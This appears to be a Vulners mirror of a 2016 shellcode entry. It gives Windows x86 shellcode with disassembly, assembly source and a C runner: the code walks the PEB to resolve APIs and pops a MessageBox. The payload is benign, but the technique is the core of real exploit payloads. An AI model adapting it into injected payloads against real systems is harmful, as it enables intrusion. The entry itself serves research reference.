Vulners
Lucene search
Windows/x86 - MessageBoxA Shellcode (242 bytes)
/*
# Title : Windows x86 MessageBoxA shellcode
# Author : Roziul Hasan Khan Shifat
# Date : 14-08-2016
# Tested On : Windows 7 starter x86
*/
/*
Disassembly of section .text:
00000000 <_start>:
0: 31 c9 xor %ecx,%ecx
2: 64 8b 41 30 mov %fs:0x30(%ecx),%eax
6: 8b 40 0c mov 0xc(%eax),%eax
9: 8b 70 14 mov 0x14(%eax),%esi
c: ad lods %ds:(%esi),%eax
d: 96 xchg %eax,%esi
e: ad lods %ds:(%esi),%eax
f: 8b 48 10 mov 0x10(%eax),%ecx
12: 31 db xor %ebx,%ebx
14: 8b 59 3c mov 0x3c(%ecx),%ebx
17: 01 cb add %ecx,%ebx
19: 8b 5b 78 mov 0x78(%ebx),%ebx
1c: 01 cb add %ecx,%ebx
1e: 8b 73 20 mov 0x20(%ebx),%esi
21: 01 ce add %ecx,%esi
23: 31 d2 xor %edx,%edx
00000025 <g>:
25: 42 inc %edx
26: ad lods %ds:(%esi),%eax
27: 01 c8 add %ecx,%eax
29: 81 38 47 65 74 50 cmpl $0x50746547,(%eax)
2f: 75 f4 jne 25 <g>
31: 81 78 04 72 6f 63 41 cmpl $0x41636f72,0x4(%eax)
38: 75 eb jne 25 <g>
3a: 81 78 08 64 64 72 65 cmpl $0x65726464,0x8(%eax)
41: 75 e2 jne 25 <g>
43: 8b 73 1c mov 0x1c(%ebx),%esi
46: 01 ce add %ecx,%esi
48: 8b 14 96 mov (%esi,%edx,4),%edx
4b: 01 ca add %ecx,%edx
4d: 89 d6 mov %edx,%esi
4f: 89 cf mov %ecx,%edi
51: 31 db xor %ebx,%ebx
53: 53 push %ebx
54: 68 61 72 79 41 push $0x41797261
59: 68 4c 69 62 72 push $0x7262694c
5e: 68 4c 6f 61 64 push $0x64616f4c
63: 54 push %esp
64: 51 push %ecx
65: ff d2 call *%edx
67: 83 c4 10 add $0x10,%esp
6a: 31 c9 xor %ecx,%ecx
6c: 68 6c 6c 42 42 push $0x42426c6c
71: 88 4c 24 02 mov %cl,0x2(%esp)
75: 68 33 32 2e 64 push $0x642e3233
7a: 68 75 73 65 72 push $0x72657375
7f: 54 push %esp
80: ff d0 call *%eax
82: 83 c4 0c add $0xc,%esp
85: 31 c9 xor %ecx,%ecx
87: 68 6f 78 41 42 push $0x4241786f
8c: 88 4c 24 03 mov %cl,0x3(%esp)
90: 68 61 67 65 42 push $0x42656761
95: 68 4d 65 73 73 push $0x7373654d
9a: 54 push %esp
9b: 50 push %eax
9c: ff d6 call *%esi
9e: 83 c4 0c add $0xc,%esp
a1: 31 d2 xor %edx,%edx
a3: 31 c9 xor %ecx,%ecx
a5: 52 push %edx
a6: 68 73 67 21 21 push $0x21216773
ab: 68 6c 65 20 6d push $0x6d20656c
b0: 68 53 61 6d 70 push $0x706d6153
b5: 8d 14 24 lea (%esp),%edx
b8: 51 push %ecx
b9: 68 68 65 72 65 push $0x65726568
be: 68 68 69 20 54 push $0x54206968
c3: 8d 0c 24 lea (%esp),%ecx
c6: 31 db xor %ebx,%ebx
c8: 43 inc %ebx
c9: 53 push %ebx
ca: 52 push %edx
cb: 51 push %ecx
cc: 31 db xor %ebx,%ebx
ce: 53 push %ebx
cf: ff d0 call *%eax
d1: 31 c9 xor %ecx,%ecx
d3: 68 65 73 73 41 push $0x41737365
d8: 88 4c 24 03 mov %cl,0x3(%esp)
dc: 68 50 72 6f 63 push $0x636f7250
e1: 68 45 78 69 74 push $0x74697845
e6: 8d 0c 24 lea (%esp),%ecx
e9: 51 push %ecx
ea: 57 push %edi
eb: ff d6 call *%esi
ed: 31 c9 xor %ecx,%ecx
ef: 51 push %ecx
f0: ff d0 call *%eax
*/
/*
section .text
global _start
_start:
xor ecx,ecx
mov eax,[fs:ecx+0x30] ;PEB
mov eax,[eax+0xc] ;PEB->Ldr
mov esi,[eax+0x14] ;PEB->ldr.InMemOrderModuleList
lodsd
xchg esi,eax
lodsd
mov ecx,[eax+0x10] ;kernel32 base address
xor ebx,ebx
mov ebx,[ecx+0x3c] ;DOS->elf_anew
add ebx,ecx
mov ebx,[ebx+0x78] ;DataDirectory->VirtualAddress
add ebx,ecx ;IMAGE_EXPORT_DIRECTORY
mov esi,[ebx+0x20] ;AddressOfNames
add esi,ecx
;--------------------------------------------------
xor edx,edx
g:
inc edx
lodsd
add eax,ecx
cmp dword [eax],'GetP'
jnz g
cmp dword [eax+4],'rocA'
jnz g
cmp dword [eax+8],'ddre'
jnz g
;-----------------------------------------------------
mov esi,[ebx+0x1c] ;AddressOfFunctions
add esi,ecx
;---------------------------------
mov edx,[esi+edx*4]
add edx,ecx ;GetProcAddress()
;------------------
mov esi,edx
mov edi,ecx
;--------------------
;finding address of LoadLibraryA()
xor ebx,ebx
push ebx
push 0x41797261
push 0x7262694c
push 0x64616f4c
push esp
push ecx
call edx
add esp,16
;---------------------------
xor ecx,ecx
;LoadLibraryA("user32.dll")
push 0x42426c6c
mov [esp+2],byte cl
push 0x642e3233
push 0x72657375
push esp
call eax
;-------------------------
;Finding address of MessageBoxA()
add esp,12
xor ecx,ecx
push 0x4241786f
mov [esp+3],byte cl
push 0x42656761
push 0x7373654d
push esp
push eax
call esi
;---------------------------------
add esp,12
;----------------
;MessageBoxA(NULL,"Sample msg!!","hi There",1)
xor edx,edx
xor ecx,ecx
push edx
push 0x21216773
push 0x6d20656c
push 0x706d6153
lea edx,[esp] ; "Sample msg!!"
push ecx
push 0x65726568
push 0x54206968
lea ecx,[esp] ; "hi There"
xor ebx,ebx
inc ebx
push ebx
push edx
push ecx
xor ebx,ebx
push ebx
call eax
;----------------------
xor ecx,ecx
push 0x41737365
mov [esp+3],byte cl
push 0x636f7250
push 0x74697845
lea ecx,[esp]
push ecx
push edi
call esi
;---------------
xor ecx,ecx
push ecx
call eax
*/
#include<stdio.h>
#include<string.h>
char shellcode[]=\
"\x31\xc9\x64\x8b\x41\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x8b\x48\x10\x31\xdb\x8b\x59\x3c\x01\xcb\x8b\x5b\x78\x01\xcb\x8b\x73\x20\x01\xce\x31\xd2\x42\xad\x01\xc8\x81\x38\x47\x65\x74\x50\x75\xf4\x81\x78\x04\x72\x6f\x63\x41\x75\xeb\x81\x78\x08\x64\x64\x72\x65\x75\xe2\x8b\x73\x1c\x01\xce\x8b\x14\x96\x01\xca\x89\xd6\x89\xcf\x31\xdb\x53\x68\x61\x72\x79\x41\x68\x4c\x69\x62\x72\x68\x4c\x6f\x61\x64\x54\x51\xff\xd2\x83\xc4\x10\x31\xc9\x68\x6c\x6c\x42\x42\x88\x4c\x24\x02\x68\x33\x32\x2e\x64\x68\x75\x73\x65\x72\x54\xff\xd0\x83\xc4\x0c\x31\xc9\x68\x6f\x78\x41\x42\x88\x4c\x24\x03\x68\x61\x67\x65\x42\x68\x4d\x65\x73\x73\x54\x50\xff\xd6\x83\xc4\x0c\x31\xd2\x31\xc9\x52\x68\x73\x67\x21\x21\x68\x6c\x65\x20\x6d\x68\x53\x61\x6d\x70\x8d\x14\x24\x51\x68\x68\x65\x72\x65\x68\x68\x69\x20\x54\x8d\x0c\x24\x31\xdb\x43\x53\x52\x51\x31\xdb\x53\xff\xd0\x31\xc9\x68\x65\x73\x73\x41\x88\x4c\x24\x03\x68\x50\x72\x6f\x63\x68\x45\x78\x69\x74\x8d\x0c\x24\x51\x57\xff\xd6\x31\xc9\x51\xff\xd0";
main()
{
printf("shellcode lenght %ld\n",(long)strlen(shellcode));
(* (int(*)()) shellcode) ();
}
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
16 Aug 2016 00:00Current
7.4High risk
Vulners AI Score7.4